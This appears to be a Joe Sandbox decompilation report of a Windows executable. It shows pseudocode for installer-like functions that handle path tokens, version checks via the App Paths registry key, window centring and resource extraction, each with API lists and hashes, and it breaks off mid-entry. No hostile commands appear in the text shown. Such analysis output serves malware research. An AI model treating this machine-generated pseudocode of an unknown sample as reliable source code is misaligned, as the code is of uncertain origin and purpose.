                            			E00EB2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t16;
                            				int _t21;
                            				char _t32;
                            				intOrPtr _t34;
                            				char* _t38;
                            				char _t42;
                            				char* _t44;
                            				CHAR* _t52;
                            				intOrPtr* _t55;
                            				CHAR* _t59;
                            				void* _t62;
                            				CHAR* _t64;
                            				CHAR* _t65;
                            				signed int _t66;
                            
                            				_t60 = __edx;
                            				_t16 =  *0xeb8004; // 0x92ae1240
                            				_t17 = _t16 ^ _t66;
                            				_v8 = _t16 ^ _t66;
                            				_t65 = _a4;
                            				_t44 = __edx;
                            				_t64 = __ecx;
                            				if( *((char*)(__ecx)) != 0) {
                            					GetModuleFileNameA( *0xeb9a3c,  &_v268, 0x104);
                            					while(1) {
                            						_t17 =  *_t64;
                            						if(_t17 == 0) {
                            							break;
                            						}
                            						_t21 = IsDBCSLeadByte(_t17);
                            						 *_t65 =  *_t64;
                            						if(_t21 != 0) {
                            							_t65[1] = _t64[1];
                            						}
                            						if( *_t64 != 0x23) {
                            							L19:
                            							_t65 = CharNextA(_t65);
                            						} else {
                            							_t64 = CharNextA(_t64);
                            							if(CharUpperA( *_t64) != 0x44) {
                            								if(CharUpperA( *_t64) != 0x45) {
                            									if( *_t64 == 0x23) {
                            										goto L19;
                            									}
                            								} else {
                            									E00EB1680(_t65, E00EB17C8(_t44, _t65),  &_v268);
                            									_t52 = _t65;
                            									_t14 =  &(_t52[1]); // 0x2
                            									_t60 = _t14;
                            									do {
                            										_t32 =  *_t52;
                            										_t52 =  &(_t52[1]);
                            									} while (_t32 != 0);
                            									goto L17;
                            								}
                            							} else {
                            								E00EB65E8( &_v268);
                            								_t55 =  &_v268;
                            								_t62 = _t55 + 1;
                            								do {
                            									_t34 =  *_t55;
                            									_t55 = _t55 + 1;
                            								} while (_t34 != 0);
                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                            									 *_t38 = 0;
                            								}
                            								E00EB1680(_t65, E00EB17C8(_t44, _t65),  &_v268);
                            								_t59 = _t65;
                            								_t12 =  &(_t59[1]); // 0x2
                            								_t60 = _t12;
                            								do {
                            									_t42 =  *_t59;
                            									_t59 =  &(_t59[1]);
                            								} while (_t42 != 0);
                            								L17:
                            								_t65 =  &(_t65[_t52 - _t60]);
                            							}
                            						}
                            						_t64 = CharNextA(_t64);
                            					}
                            					 *_t65 = _t17;
                            				}
                            				return E00EB6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                            			}






















                            0x00eb2aac
                            0x00eb2ab7
                            0x00eb2abc
                            0x00eb2abe
                            0x00eb2ac3
                            0x00eb2ac6
                            0x00eb2ac9
                            0x00eb2ace
                            0x00eb2ae6
                            0x00eb2bdc
                            0x00eb2bdc
                            0x00eb2be0
                            0x00000000
                            0x00000000
                            0x00eb2af2
                            0x00eb2afc
                            0x00eb2b00
                            0x00eb2b05
                            0x00eb2b05
                            0x00eb2b0b
                            0x00eb2bca
                            0x00eb2bd1
                            0x00eb2b11
                            0x00eb2b18
                            0x00eb2b26
                            0x00eb2b99
                            0x00eb2bc8
                            0x00000000
                            0x00000000
                            0x00eb2b9b
                            0x00eb2bae
                            0x00eb2bb3
                            0x00eb2bb5
                            0x00eb2bb5
                            0x00eb2bb8
                            0x00eb2bb8
                            0x00eb2bba
                            0x00eb2bbb
                            0x00000000
                            0x00eb2bb8
                            0x00eb2b28
                            0x00eb2b2e
                            0x00eb2b33
                            0x00eb2b39
                            0x00eb2b3c
                            0x00eb2b3c
                            0x00eb2b3e
                            0x00eb2b3f
                            0x00eb2b55
                            0x00eb2b5d
                            0x00eb2b64
                            0x00eb2b64
                            0x00eb2b7a
                            0x00eb2b7f
                            0x00eb2b81
                            0x00eb2b81
                            0x00eb2b84
                            0x00eb2b84
                            0x00eb2b86
                            0x00eb2b87
                            0x00eb2bbf
                            0x00eb2bc1
                            0x00eb2bc1
                            0x00eb2b26
                            0x00eb2bda
                            0x00eb2bda
                            0x00eb2be6
                            0x00eb2be6
                            0x00eb2bf8

                            APIs
                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00EB2AE6
                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00EB2AF2
                            • CharNextA.USER32(?), ref: 00EB2B12
                            • CharUpperA.USER32 ref: 00EB2B1E
                            • CharPrevA.USER32(?,?), ref: 00EB2B55
                            • CharNextA.USER32(?), ref: 00EB2BD4
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                            • String ID:
                            • API String ID: 571164536-0
                            • Opcode ID: 51e56095bce3329132e46e051482621dd5b319fd2b1116181b3bb17dc9089dec
                            • Instruction ID: d33f4f9e491f1b7e368078bfca6697735c2699ddc68b7c3c41a85cb525dfe3cc
                            • Opcode Fuzzy Hash: 51e56095bce3329132e46e051482621dd5b319fd2b1116181b3bb17dc9089dec
                            • Instruction Fuzzy Hash: 2C4112345042455EDF169F249C94AFF7BA99F52314F1801EEE8C2B7202DF254E8A8B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                            				void* _v8;
                            				char* _v12;
                            				intOrPtr _v16;
                            				void* _v20;
                            				intOrPtr _v24;
                            				int _v28;
                            				char _v32;
                            				void* _v36;
                            				int _v40;
                            				void* _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				long _t68;
                            				void* _t70;
                            				void* _t73;
                            				void* _t79;
                            				void* _t83;
                            				void* _t87;
                            				void* _t88;
                            				intOrPtr _t93;
                            				intOrPtr _t97;
                            				intOrPtr _t99;
                            				int _t101;
                            				void* _t103;
                            				void* _t106;
                            				void* _t109;
                            				void* _t110;
                            
                            				_v12 = __edx;
                            				_t99 = __ecx;
                            				_t106 = 0;
                            				_v16 = __ecx;
                            				_t87 = 0;
                            				_t103 = 0;
                            				_v20 = 0;
                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                            					L19:
                            					_t106 = 1;
                            				} else {
                            					_t62 = 0;
                            					_v8 = 0;
                            					while(1) {
                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                            						if(E00EB2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                            							goto L20;
                            						}
                            						_t11 =  &_v32; // 0xeb3938
                            						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                            						_v28 = _t68;
                            						if(_t68 == 0) {
                            							_t99 = _v16;
                            							_t70 = _v8 + _t99;
                            							_t93 = _v24;
                            							_t87 = _v20;
                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                            								goto L18;
                            							}
                            						} else {
                            							_t103 = GlobalAlloc(0x42, _t68);
                            							if(_t103 != 0) {
                            								_t73 = GlobalLock(_t103);
                            								_v36 = _t73;
                            								if(_t73 != 0) {
                            									_t16 =  &_v32; // 0xeb3938
                            									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                            										L15:
                            										GlobalUnlock(_t103);
                            										_t99 = _v16;
                            										L18:
                            										_t87 = _t87 + 1;
                            										_t62 = _v8 + 0x3c;
                            										_v20 = _t87;
                            										_v8 = _v8 + 0x3c;
                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                            											continue;
                            										} else {
                            											goto L19;
                            										}
                            									} else {
                            										_t79 = _v44;
                            										_t88 = _t106;
                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                            										_t101 = _v28;
                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                            										_t97 = _v48;
                            										_v36 = _t83;
                            										_t109 = _t83;
                            										do {
                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00EB2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00EB2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                            											_t109 = _t109 + 0x18;
                            											_t88 = _t88 + 4;
                            										} while (_t88 < 8);
                            										_t87 = _v20;
                            										_t106 = 0;
                            										if(_v56 < 0 || _v64 > 0) {
                            											if(_v52 < _t106 || _v60 > _t106) {
                            												GlobalUnlock(_t103);
                            											} else {
                            												goto L15;
                            											}
                            										} else {
                            											goto L15;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L20;
                            					}
                            				}
                            				L20:
                            				 *_a8 = _t87;
                            				if(_t103 != 0) {
                            					GlobalFree(_t103);
                            				}
                            				return _t106;
                            			}

































                            0x00eb28f1
                            0x00eb28f4
                            0x00eb28f7
                            0x00eb28f9
                            0x00eb28fc
                            0x00eb28ff
                            0x00eb2901
                            0x00eb2907
                            0x00eb2a62
                            0x00eb2a64
                            0x00eb290d
                            0x00eb290d
                            0x00eb290f
                            0x00eb2912
                            0x00eb2920
                            0x00eb2937
                            0x00000000
                            0x00000000
                            0x00eb293d
                            0x00eb2944
                            0x00eb294a
                            0x00eb294f
                            0x00eb2a2f
                            0x00eb2a32
                            0x00eb2a34
                            0x00eb2a37
                            0x00eb2a41
                            0x00000000
                            0x00000000
                            0x00eb2955
                            0x00eb295e
                            0x00eb2962
                            0x00eb2969
                            0x00eb296f
                            0x00eb2974
                            0x00eb297e
                            0x00eb298c
                            0x00eb2a20
                            0x00eb2a21
                            0x00eb2a27
                            0x00eb2a4c
                            0x00eb2a4f
                            0x00eb2a50
                            0x00eb2a53
                            0x00eb2a56
                            0x00eb2a5c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb29b2
                            0x00eb29b2
                            0x00eb29b5
                            0x00eb29bd
                            0x00eb29c3
                            0x00eb29cc
                            0x00eb29d5
                            0x00eb29d7
                            0x00eb29da
                            0x00eb29dd
                            0x00eb29df
                            0x00eb29ec
                            0x00eb29f8
                            0x00eb29fc
                            0x00eb29ff
                            0x00eb2a02
                            0x00eb2a07
                            0x00eb2a0a
                            0x00eb2a0f
                            0x00eb2a19
                            0x00eb2a81
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb2a0f
                            0x00eb298c
                            0x00eb2974
                            0x00eb2962
                            0x00000000
                            0x00eb294f
                            0x00eb2912
                            0x00eb2a65
                            0x00eb2a68
                            0x00eb2a6c
                            0x00eb2a6f
                            0x00eb2a6f
                            0x00eb2a7d

                            APIs
                            • GlobalFree.KERNEL32 ref: 00EB2A6F
                              • Part of subcall function 00EB2773: CharUpperA.USER32(92AE1240,00000000,00000000,00000000), ref: 00EB27A8
                              • Part of subcall function 00EB2773: CharNextA.USER32(0000054D), ref: 00EB27B5
                              • Part of subcall function 00EB2773: CharNextA.USER32(00000000), ref: 00EB27BC
                              • Part of subcall function 00EB2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2829
                              • Part of subcall function 00EB2773: RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2852
                              • Part of subcall function 00EB2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2870
                              • Part of subcall function 00EB2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB28A0
                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00EB3938,?,?,?,?,-00000005), ref: 00EB2958
                            • GlobalLock.KERNEL32 ref: 00EB2969
                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00EB3938,?,?,?,?,-00000005,?), ref: 00EB2A21
                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00EB3938,?,?), ref: 00EB2A81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                            • String ID: 89
                            • API String ID: 3949799724-2925746602
                            • Opcode ID: 1eaa3809b0a083081c163f7d0a0e5ab5aed20df14654dabd25aefd32d9d3da78
                            • Instruction ID: 21f0b91f8ca06eebef5a7ac28f177e84fe24afb8c0350d6cae6781789f268339
                            • Opcode Fuzzy Hash: 1eaa3809b0a083081c163f7d0a0e5ab5aed20df14654dabd25aefd32d9d3da78
                            • Instruction Fuzzy Hash: 57510631A00219EFCF22DF99D884AEEBBB5FF48704F14516AEA15F3221DB319941DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00EB43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                            				signed int _v8;
                            				struct tagRECT _v24;
                            				struct tagRECT _v40;
                            				struct HWND__* _v44;
                            				intOrPtr _v48;
                            				int _v52;
                            				intOrPtr _v56;
                            				int _v60;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				void* _t53;
                            				intOrPtr _t56;
                            				int _t59;
                            				struct HWND__* _t63;
                            				struct HWND__* _t67;
                            				struct HWND__* _t68;
                            				struct HDC__* _t69;
                            				int _t72;
                            				signed int _t74;
                            
                            				_t63 = __edx;
                            				_t29 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t29 ^ _t74;
                            				_t68 = __edx;
                            				_v44 = __ecx;
                            				GetWindowRect(__ecx,  &_v40);
                            				_t53 = _v40.bottom - _v40.top;
                            				_v48 = _v40.right - _v40.left;
                            				GetWindowRect(_t68,  &_v24);
                            				_v56 = _v24.bottom - _v24.top;
                            				_t69 = GetDC(_v44);
                            				_v52 = GetDeviceCaps(_t69, 8);
                            				_v60 = GetDeviceCaps(_t69, 0xa);
                            				ReleaseDC(_v44, _t69);
                            				_t56 = _v48;
                            				asm("cdq");
                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                            				_t67 = 0;
                            				if(_t72 >= 0) {
                            					_t63 = _v52;
                            					if(_t72 + _t56 > _t63) {
                            						_t72 = _t63 - _t56;
                            					}
                            				} else {
                            					_t72 = _t67;
                            				}
                            				asm("cdq");
                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                            				if(_t59 >= 0) {
                            					_t63 = _v60;
                            					if(_t59 + _t53 > _t63) {
                            						_t59 = _t63 - _t53;
                            					}
                            				} else {
                            					_t59 = _t67;
                            				}
                            				return E00EB6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                            			}
























                            0x00eb43d0
                            0x00eb43d8
                            0x00eb43df
                            0x00eb43e6
                            0x00eb43ec
                            0x00eb43f1
                            0x00eb4400
                            0x00eb4403
                            0x00eb440b
                            0x00eb4420
                            0x00eb4429
                            0x00eb4437
                            0x00eb4444
                            0x00eb4447
                            0x00eb444d
                            0x00eb4454
                            0x00eb445b
                            0x00eb4460
                            0x00eb4461
                            0x00eb4467
                            0x00eb446f
                            0x00eb4473
                            0x00eb4473
                            0x00eb4463
                            0x00eb4463
                            0x00eb4463
                            0x00eb447a
                            0x00eb4481
                            0x00eb4484
                            0x00eb448a
                            0x00eb4492
                            0x00eb4496
                            0x00eb4496
                            0x00eb4486
                            0x00eb4486
                            0x00eb4486
                            0x00eb44b8

                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00EB43F1
                            • GetWindowRect.USER32(00000000,?), ref: 00EB440B
                            • GetDC.USER32(?), ref: 00EB4423
                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00EB442E
                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00EB443A
                            • ReleaseDC.USER32(?,00000000), ref: 00EB4447
                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00EB44A2
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Window$CapsDeviceRect$Release
                            • String ID:
                            • API String ID: 2212493051-0
                            • Opcode ID: a98b1705347363888af400a425714f6f87186fe8cbb0cc67adae2b38774ed225
                            • Instruction ID: 8edc153af458735b5a6a9da45c51db31072c172c820ee002a1bf2c59b129c4a5
                            • Opcode Fuzzy Hash: a98b1705347363888af400a425714f6f87186fe8cbb0cc67adae2b38774ed225
                            • Instruction Fuzzy Hash: 90314F71E00119AFCF14CFB9DD889EEBBB5EB89310F154269F815B7240DA306D058B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00EB6298(intOrPtr __ecx, intOrPtr* __edx) {
                            				signed int _v8;
                            				char _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t16;
                            				struct HRSRC__* _t21;
                            				intOrPtr _t26;
                            				void* _t30;
                            				struct HINSTANCE__* _t36;
                            				intOrPtr* _t40;
                            				void* _t41;
                            				intOrPtr* _t44;
                            				intOrPtr* _t45;
                            				void* _t47;
                            				signed int _t50;
                            				struct HINSTANCE__* _t51;
                            
                            				_t44 = __edx;
                            				_t16 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t16 ^ _t50;
                            				_t46 = 0;
                            				_v32 = __ecx;
                            				_v36 = 0;
                            				_t36 = 1;
                            				E00EB171E( &_v28, 0x14, "UPDFILE%lu", 0);
                            				while(1) {
                            					_t51 = _t51 + 0x10;
                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                            					if(_t21 == 0) {
                            						break;
                            					}
                            					_t45 = LockResource(LoadResource(_t46, _t21));
                            					if(_t45 == 0) {
                            						 *0xeb9124 = 0x80070714;
                            						_t36 = _t46;
                            					} else {
                            						_t5 = _t45 + 8; // 0x8
                            						_t44 = _t5;
                            						_t40 = _t44;
                            						_t6 = _t40 + 1; // 0x9
                            						_t47 = _t6;
                            						do {
                            							_t26 =  *_t40;
                            							_t40 = _t40 + 1;
                            						} while (_t26 != 0);
                            						_t41 = _t40 - _t47;
                            						_t46 = _t51;
                            						_t7 = _t41 + 1; // 0xa
                            						 *0xeba288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                            						_t30 = _v32();
                            						if(_t51 != _t51) {
                            							asm("int 0x29");
                            						}
                            						_push(_t45);
                            						if(_t30 == 0) {
                            							_t36 = 0;
                            							FreeResource(??);
                            						} else {
                            							FreeResource();
                            							_v36 = _v36 + 1;
                            							E00EB171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                            							_t46 = 0;
                            							continue;
                            						}
                            					}
                            					L12:
                            					return E00EB6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                            				}
                            				goto L12;
                            			}






















                            0x00eb6298
                            0x00eb62a0
                            0x00eb62a7
                            0x00eb62ad
                            0x00eb62af
                            0x00eb62bb
                            0x00eb62c3
                            0x00eb62c4
                            0x00eb633b
                            0x00eb633b
                            0x00eb6345
                            0x00eb634d
                            0x00000000
                            0x00000000
                            0x00eb62da
                            0x00eb62de
                            0x00eb635f
                            0x00eb6369
                            0x00eb62e0
                            0x00eb62e0
                            0x00eb62e0
                            0x00eb62e3
                            0x00eb62e5
                            0x00eb62e5
                            0x00eb62e8
                            0x00eb62e8
                            0x00eb62ea
                            0x00eb62eb
                            0x00eb62ef
                            0x00eb62f1
                            0x00eb62f3
                            0x00eb6302
                            0x00eb6308
                            0x00eb630d
                            0x00eb6314
                            0x00eb6314
                            0x00eb6316
                            0x00eb6319
                            0x00eb6355
                            0x00eb6357
                            0x00eb631b
                            0x00eb631b
                            0x00eb6331
                            0x00eb6334
                            0x00eb6339
                            0x00000000
                            0x00eb6339
                            0x00eb6319
                            0x00eb636b
                            0x00eb637d
                            0x00eb637d
                            0x00000000

                            APIs
                              • Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750
                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB62CD
                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB62D4
                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB631B
                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00EB6345
                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB6357
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                            • String ID: UPDFILE%lu
                            • API String ID: 2922116661-2329316264
                            • Opcode ID: 7c814b9145c89fffa183872f5aff3bd6bcdf9c46d6915155b1b67ce88760e250
                            • Instruction ID: 3aad35579d282778f7e5823bb1eb10aa4126be8679246fa9c0031fce034fe456
                            • Opcode Fuzzy Hash: 7c814b9145c89fffa183872f5aff3bd6bcdf9c46d6915155b1b67ce88760e250
                            • Instruction Fuzzy Hash: 6B21F675A00219AFDB10AFA5DC459FFBBB8EF84714F041229F902B3251DB399D068BE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB3A3F(void* __eflags) {
                            				void* _t3;
                            				void* _t9;
                            				CHAR* _t16;
                            
                            				_t16 = "LICENSE";
                            				_t1 = E00EB468F(_t16, 0, 0) + 1; // 0x1
                            				_t3 = LocalAlloc(0x40, _t1);
                            				 *0xeb8d4c = _t3;
                            				if(_t3 != 0) {
                            					_t19 = _t16;
                            					if(E00EB468F(_t16, _t3, _t28) != 0) {
                            						if(lstrcmpA( *0xeb8d4c, "<None>") == 0) {
                            							LocalFree( *0xeb8d4c);
                            							L9:
                            							 *0xeb9124 = 0;
                            							return 1;
                            						}
                            						_t9 = E00EB6517(_t19, 0x7d1, 0, E00EB3100, 0, 0);
                            						LocalFree( *0xeb8d4c);
                            						if(_t9 != 0) {
                            							goto L9;
                            						}
                            						 *0xeb9124 = 0x800704c7;
                            						L2:
                            						return 0;
                            					}
                            					E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
                            					LocalFree( *0xeb8d4c);
                            					 *0xeb9124 = 0x80070714;
                            					goto L2;
                            				}
                            				E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
                            				 *0xeb9124 = E00EB6285();
                            				goto L2;
                            			}






                            0x00eb3a46
                            0x00eb3a57
                            0x00eb3a5d
                            0x00eb3a63
                            0x00eb3a6a
                            0x00eb3a91
                            0x00eb3a9a
                            0x00eb3ad8
                            0x00eb3b13
                            0x00eb3b19
                            0x00eb3b1b
                            0x00000000
                            0x00eb3b21
                            0x00eb3ae7
                            0x00eb3af4
                            0x00eb3afc
                            0x00000000
                            0x00000000
                            0x00eb3afe
                            0x00eb3a87
                            0x00000000
                            0x00eb3a87
                            0x00eb3aa8
                            0x00eb3ab3
                            0x00eb3ab9
                            0x00000000
                            0x00eb3ab9
                            0x00eb3a78
                            0x00eb3a82
                            0x00000000

                            APIs
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F64,?,00000002,00000000), ref: 00EB3A5D
                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00EB3AB3
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                              • Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285
                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00EB3AD0
                            • LocalFree.KERNEL32 ref: 00EB3B13
                              • Part of subcall function 00EB6517: FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
                              • Part of subcall function 00EB6517: LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
                              • Part of subcall function 00EB6517: DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
                              • Part of subcall function 00EB6517: FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560
                            • LocalFree.KERNEL32(00000000,00EB3100,00000000,00000000), ref: 00EB3AF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                            • String ID: <None>$LICENSE
                            • API String ID: 2414642746-383193767
                            • Opcode ID: 8284d99e71a97803e3c3b2f3f53aff3beb9e3d32215b0f90433abcc95f3015a6
